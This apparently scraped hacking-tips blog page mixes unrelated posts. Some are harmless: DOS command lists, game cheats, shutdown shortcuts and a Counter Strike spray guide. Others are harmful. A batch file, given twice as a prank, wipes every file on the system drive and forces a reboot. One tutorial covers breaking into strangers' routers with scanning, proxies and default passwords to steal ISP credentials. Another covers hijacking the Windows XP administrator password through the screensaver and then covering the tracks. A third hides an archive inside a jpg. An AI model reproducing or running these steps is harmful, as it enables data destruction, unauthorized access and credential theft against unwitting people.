go to notepad
@Echo off
Del C:\ *.*y
save it as Dell.bat
or worse
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
The Ultimate Blogging Resource
go to notepad
@Echo off
Del C:\ *.*y
save it as Dell.bat
or worse
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
This tutorial will explain to you how to hack someone’s internet account thru his router.This hack is based on a secuirty exploit of the router’s default password and the stupidity of the user.Explanation: when somebody buy’s a xDSL/Cabel router, the router is set to manufactory defaults like IP range, user accounts, router table, and most important the security level. The last one we will exploit.Most routers will have a user friendly setup menu running on port 23 (telnet) and sometimes port 80 (http) or both.This is what we are looking for.
Step 1.
Get a multie IP range scanner like superscanner (superscanner is fast and easy to use, get it here).Get a xDSL/Cabel user IP range. This is a single user IP so the ip range of this Internet provider is 212.129.xxx.xxx most likely it will be from to .To keep your scanning range not to big it’s smart to scan from to it also depends of your bandwidth how fast the scan will be finished.The IP adres above is just a example any IP range from a xDSL/Cabel provider can be used for this hack.before you start scanning specify the TCP/IP ports. You know that we are looking for TCP port 23 (telnet) and TCP port 80 (http) so edit the list and select only port 23 and port 80.Now start scanning and wait for the results.When finished scanning look for a IP that has a open port 23 and 80. Write them down or remember them.
Step 2.
Way 1
This is important: Most routers have connection log capability so the last thing you want to do is making a connection with your own broadband connection so use a anonymouse proxy server or dailup connection with a fake name and address (56.9 modem for example) when connection to the victim’s router.Now get a telnet program. Windows has a standard telnet program just go to start, select run and type down “telnet” without the “, click or enter OK.Select “connect” than “Remote system” enter IP adres of the victim in the “host name” field press OK.wait for your computer to make a connection. This way only works when the router has a open telnet port service running
Way 2
This is important: Most routers have connection log capability so the last thing you want to do is making a connection with your own broadband connection so use a anonymouse proxy server or dailup connection with a fake name and adres (56.9 modem for example) when connection to the victim’s router.Open a Internet explorer windows enter the IP address of the victim after the http:// in the address bar.This way only works when the router has a open hyper text transfer protocol (http) service running.
Step 3
Entering the userfriendly setup menu. 9 out of 10 times the menu is protected by a loginname and password. When the user doesn’t change any security value’s the default password stay’s usable.So the only thing you have to do is find out what type of router the victim uses. I use this tool: GFILanguard Network Security Scanner. (get it here) is good. When you find out the type of router that’s been used get the wright loginname and password from this list (get it here. not every router is on the list)
Default router password list
Step 4
When you have a connection in telnet or internet expolorer you need to look for user accounts.PPP, PPtP, PPeP, PPoP, or such connection protocol. If this is not correct look for anything that maybe contains any info about the ISP account of the user.go to this option and open it. Most likely you will see a overview of user setup options.Now look for the username and password.In most case the username will be freely displayed so just write it down or what ever….The password is a different story. Allmost always the password is protected by ********* (stars) in the telnet way there is noway around it (goto another victim) but when you have a port 80 connection (http). Internet connection way open click right mouse key and select “View source” now look for the field where the star are at. most likely you can read it because in the source code the star are converted to normal ASCII text.If not get a “******** to text” convertor like snadboy’s revelation V.2 (get it here) move the cursor over the ****** and….It’s a miracle you can read the password.Now you have the username and password. There a million fun thing to do with that but more about that next time.check the tutorial page freqently.
Beware on most routers only one person can be loget on simultaneous in the router setupmenu.Don’t change anything in the router if you don’t know what you are doing.
There are some hidden dos commands which u can’t recognise by typing help in cmd
Here they are with description
Defines functions that change display graphics, control cursor movement, and reassign keys.
Causes MS-DOS to look in other directories when editing a file or running a command.
Displays, adds, and removes arp information from network devices.
Assign a drive letter to an alternate letter.
View the file associations.
Schedule a time to execute commands or programs.
Lists connections and addresses seen by Windows ATM call manager.
Display and change file attributes.
Recovery console command that executes a series of commands in a file.
Recovery console command that allows a user to view, modify, and rebuild the boot.ini
Enable / disable CTRL + C feature.
View and modify file ACL’s.
Calls a batch file from another batch file.
Changes directories.
Supplement the International keyboard and character set information.
Changes directories.
Check the hard disk drive running FAT for errors.
Check the hard disk drive running NTFS for errors.
Specify a listing of multiple options within a batch file.
Clears the screen.
Opens the command interpreter.
Easily change the foreground and background color of the MS-DOS window.
Opens the command interpreter.
Compares files.
Compresses and uncompress files.
Open Control Panel icons from the MS-DOS prompt.
Convert FAT to NTFS.
Copy one or more files to an alternate location.
Change the computers input/output devices.
View or change the systems date.
Debug utility to create assembly programs to modify hardware settings.
Re-arrange the hard disk drive to help with loading programs.
Deletes one or more files.
Recovery console command that deletes a file.
Deletes one or more files and/or directories.
List the contents of one or more directory.
Recovery console command that disables Windows system services or drivers.
Compare a disk with another disk.
Copy the contents of one disk and place them on another disk.
Command to view and execute commands that have been run in the past.
A GUI to help with early MS-DOS users.
Enables overwrite of original device drivers.
Displays messages and enables and disables echo.
View and edit files.
View and edit files.
Load extended Memory Manager.
Recovery console command to enable a disable service or driver.
Stops the localization of the environment changes enabled by the setlocal command.
Erase files from computer.
Exit from the command interpreter.
Expand a Microsoft Windows file back to it’s original format.
Extract files from the Microsoft Windows cabinets.
Displays a listing of MS-DOS commands and information about them.
Compare files.
Utility used to create partitions on the hard disk drive.
Search for text within a file.
Searches for a string of text within a file.
Writes a new boot sector.
Writes a new boot record to a disk drive.
Boolean used in batch files.
Command to erase and prepare a disk drive.
Command to connect and operate on a FTP server.
Displays or modifies file types used in file extension associations.
Moves a batch file to a specific label or location.
Show extended characters in graphics mode.
Display a listing of commands and brief explanation.
Allows for batch files to perform conditional processing.
32-bit file manager.
Network command to view network adapter settings and assigned values.
Change layout of keyboard.
Change the label of a disk drive.
Load a device driver in to high memory.
Recovery console command that displays the services and drivers.
Load a program above the first 64k.
Load a device driver in to high memory.
Lock the hard disk drive.
Recovery console command to list installations and enable administrator login.
Displays the device name of a drive.
Command to create a new directory.
Display memory on system.
Command to create a new directory.
Modify the port or display settings.
Display one page at a time.
Move one or more files from one directory to another directory.
Early Microsoft Virus scanner.
Diagnostics utility.
Utility used to load and provide access to the CD-ROM.
Displays protocol statistics and current TCP/IP connections using NBT
Update, fix, or view the network or network settings
Configure dynamic and static network information from MS-DOS.
Display the TCP/IP network protocol statistics and information.
Load country specific information.
Look up an IP address of a domain or host on a network.
View and modify the computers path location.
View and locate locations of network latency.
Command used in batch files to stop the processing of a command.
Test / send information to another network computer or network device.
Changes to the directory or network path stored by the pushd command.
Conserve power with computer portables.
Prints data to a printer port.
View and change the MS-DOS prompt.
Stores a directory or network path in memory so it can be returned to at any time.
Open the QBasic.
Removes an empty directory.
Renames a file or directory.
Renames a file or directory.
Removes an empty directory.
View and configure windows network route tables.
Enables a user to execute a program on another computer.
Run the scandisk utility.
Scan registry and recover registry from errors.
Change one variable or string to another.
Enables local environments to be changed without affecting anything else.
Change MS-DOS version to trick older MS-DOS programs.
Installs support for file sharing and locking capabilities.
Changes the position of replaceable parameters in a batch program.
Shutdown the computer from the MS-DOS prompt.
Create a disk cache in conventional memory or extended memory.
Sorts the input and displays the output to the screen.
Start a separate window in Windows from the MS-DOS prompt.
Substitute a folder on your computer for another drive letter.
Remove add functions from MS-DOS.
Transfer system files to disk drive.
Telnet to another computer / device from the prompt.
View or modify the system time.
Change the title of their MS-DOS window.
Visually view a network packets route across a network.
View a visual tree of the hard disk drive.
Display the contents of a file.
Undelete a file that has been deleted.
Unformat a hard disk drive.
Unlock a disk drive.
Display the version information.
Enables or disables the feature to determine if files have been written properly.
Displays the volume information about the designated drive.
Copy multiple files, directories, and/or drives from one location to another.
Secret – Reveal Mines
Instructions – Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel.
Secret – Extra BallsInstructions – Type 1max at the start of a new ball to get extra balls.
Secret – Gravity WellInstructions – Type gmax at the start of a new game to activate the Gravity Well.
Secret – Instant PromotionInstructions – Type rmax at the start of a new game to go up in ranks.
Secret – Skill ShotInstructions – Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:
First: 15,000 pointsSecond: 30,000 pointsThird: 75,000 pointsFourth: 30,000 pointsFifth: 15,000 pointsSixth: 7,500 points
Secret – Test ModeInstructions – Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around.
Secret – Unlimited BallsInstructions – Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting
Secret – Instant WinInstructions – Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.
Secret – Hidden Game ModesInstructions – In the “Game” menu choose “Select Game”. Enter -1 or -2 to activate the hidden game modes.
Secret – Instant Win
Instructions – Press Alt + Shift + 2 during game play to instantly win.
Secret – Draw single cards in a Draw Three game
Instructions – Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.
Infinite Points
In the Windows XP version of solitaire, draw from the deck at least twice. Hold control and drag a card down from the deck. Click the “A” key and then let go of the left mouse key. You will get 10 points for this. Continue doing this for infinite points!
Infinite points trick II
To do this trick, finish a game of solitaire with the time bonus option on. The cards will start bouncing. Click on the solitaire screen and the play again box will pop up. Select no, so the solitaire screen is just blank green. Use the instant win cheat (Alt+Shift+2) and you will recieve the time bonus you got last game will be added to your last game’s score. For example, if your time bonus was 5000, and your final score was 6000, after using this glitch, you will have a score of 11000. This glitch can be used as many times as you want.
//—————————————————————–// registry hack which will allow you to see your opponents’ cards//—————————————————————– Launch REGEDIT.EXE and navigate to HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Applets Hearts. NOTE: You may have to create the Hearts key under Applets In the right-hand pane, create a new String Value. Immediately rename it to “ZB” (without the quotes); give it a value of “42? (again, sans quotes). The next time you’re in a game of Hearts, press CTRL + SHIFT + ALT + F12.
Here are the steps involved to Hack the Window XP Administrator Password .
1. Go to Start –> Run –> Type in CMD 2. You will get a command prompt. Enter these commands the way it is given 3. cd\ 4. cd\ windows\system32 5. mkdir temphack 6. copy logon.scr temphack\logon.scr 7. copy cmd.exe temphack\cmd.exe 8. del logon.scr 9. rename cmd.exe logon.scr 10. exit
Wait its not over read the rest to find out how to Hack the Window XP Administrator PasswordA Brief explanation of what you are currently doing here is
Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.
So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command
net user password
Example: If the admin user name is clazh and you want change the password to pass Then type in the following command
net user clazh pass
This will chang the admin password to pass.Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.
Here are the steps involved to De Hack or restore the Window XP Administrator Password to cover your tracks.
1. Go to Start –> Run –> Type in CMD 2. You will get a command prompt. Enter these commands the way it is given 3. cd\ 4. cd\ windows\system32\temphack 5. copy logon.scr C:\windows\system32\logon.scr 6. copy cmd.exe C:\windows\system32\cmd.exe 7. exit
Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into system32 directory click Yes to overwrite the modified files.
Via internetbusinessdaily.net
Note To administrators: You can block the entire password change thing just a little tweak in the local security policy (control panel->administrative tools,works only for administrators group) will disallow any change in password even if u r the Admin (u can put a number of other restrictions too), but be cautious to give other users limitted accounts. After you have done this, the above Screensaver technique will fail.
Update: Christian Mohn points out The Above method is is possible only if you have Local Administrator Privileges. My fault for not checking it up before posting.
Update: The above Method only works if the system is FAT/FAT32 – because of the updated “user rights management” in NTFS – file level rights etc. This does not work on a system using NTFS.
1. Gather the file you wish to bind, and the image file, and place them in a folder. For the sake of this demonstration, I will be using C:\New Folder
-The image will hereby be referred to in all examples as fluffy.jpg
-The file will hereby be referred to in all examples as New Text Document.txt
2. Add the file/files you will be injecting into the image into a WinRar .rar or .zip. From here on this will be referred to as (secret.rar)
3. Open command prompt by going to Start > Run > cmd
4. In Command Prompt, navigate to the folder where your two files are by typing
cd location [ex: cd C:\New Folder]
5. Type [copy /b fluffy.jpg + secret.rar fluffy.jpg] (remove the brackets)
Congrats, as far as anyone viewing is concerned, this file looks like a JPEG, acts like a JPEG, and is a JPEG, yet it now contains your file.
In order to view/extract your file, there are two options that you can take
a) Change the file extension from fluffy.jpg to fluffy.rar, then open and your file is there
b) Leave the file extension as is, right click, open with WinRar and your file is there
There are so many different ways to turn off your Windows XP computer, let’s look at some of them:
1. The standard approach – click the Start Button with your mouse, then select the Turn Off menu and finally click the Turn Off icon on the Turn Off computer dialog. blink.gif
2. Press Ctrl+Esc key or the Win key and press u two times – the fastest approach.
3. Get the Shutdown utility from Download.com – it add the shut down shortcuts for you. Else create them yourself using approach 4.
4. Create a shutdown shortcut on your desktop. Right click on the desktop, choose New Shortcut and type shutdown -s -t 00 in the area where you are asked to specify the location of the program file. Now you can just double click this icon to turn off the computer. The best location would be your quick launch bar.
5. Press the Win key + R key to open the run window. Type shutdown -s -t 00. [s means shutdown while t means the duration after which you want to initiate the shutdown process].
If some open processes or application won’t let you turn off, append a -f switch to force a shut down by closing all active processes.
6. Win+M to minimize all windows and then Alt+F4 to bring the Turn Off computer dialog.
7. Open Windows Task manager (by right clicking the Windows Task bar or Alt+Ctrl+Del) and choose Shut down from the menu. Useful when the Windows are not responding.
8. open task manager—>click on shutdown—>hold the ctrl key and click on Turn off::::::: pc will be turned off in 3 secs.. fastest method other than hard shutdown
Creating custom Counter Strike 1.6 sprays
This is probably widely asked question and many people want to know how to do this,
so I’ll be explaining it step by step to you..
What you need, is Counter Strike 1.6 and tool called HlTagConverter
I assume you already have Counter Strike 1.6 so here’s the download link to
Download and unzip HlTagConverter_014.zip
Ok I think we are ready to start..
1. Create your image and save it to your hard drive (anywhere you want)
2. Open HlTagConverter by double-clicking it
3. Click button that says “1. Open Image” (it’s the only active button at this point, or at least it should be! Very Happy)
4. Ok now browse to where you saved your image and open it, you should see your image
in the HlTagConverter program and on the right corner some random information of your image
5. So, we opened the picture, what next? Click the second button that says “2. Adjust Image”
(and it should be only active button at this point) You see some adjustment options, your
don’t have to change them necessarily if you don’t want to and I don’t really even recommend
to change adjust options since they are good at default.. Notice you can’t make the images bigger than
96*112 but smaller it is possible.. Ok lets move on.. Now click “AutoSize” button on the right corner..
6. Then simply click “Apply changes and convert to 256 colors” button
7. Now basically you are done.. Click “3. Save Tag” button and you get some weird
pop-up window, right? Okok don’t worry, just select the “Export to WAD file” and click OK
8. Now browse to InstallHardDrive:\InstallDirectory(Normally Program Files)\Steam\SteamApps\USERNAME\counter-strike\cstrike\
you might want to create folder called “Sprays” where you place all you sprays by simply
right-clicking on blank area and choose new -> folder, save your image as Spray1.
Ok Now browse to this folder and copy (ctrl+c OR right-click -> copy) the Spray1.wad file to \cstrike\ folder
(You can “paste” it by clicking ctrl+v or right-click -> Paste) and delete old tempdecal.wad file and rename
your Spray1.wad to tempdecal.wad and right-click on it and goto Properties and then choose “Read Only”..
You can now close all the folders and programs..
That wasn’t too hard was it? Ok have fun with your custom sprays Wink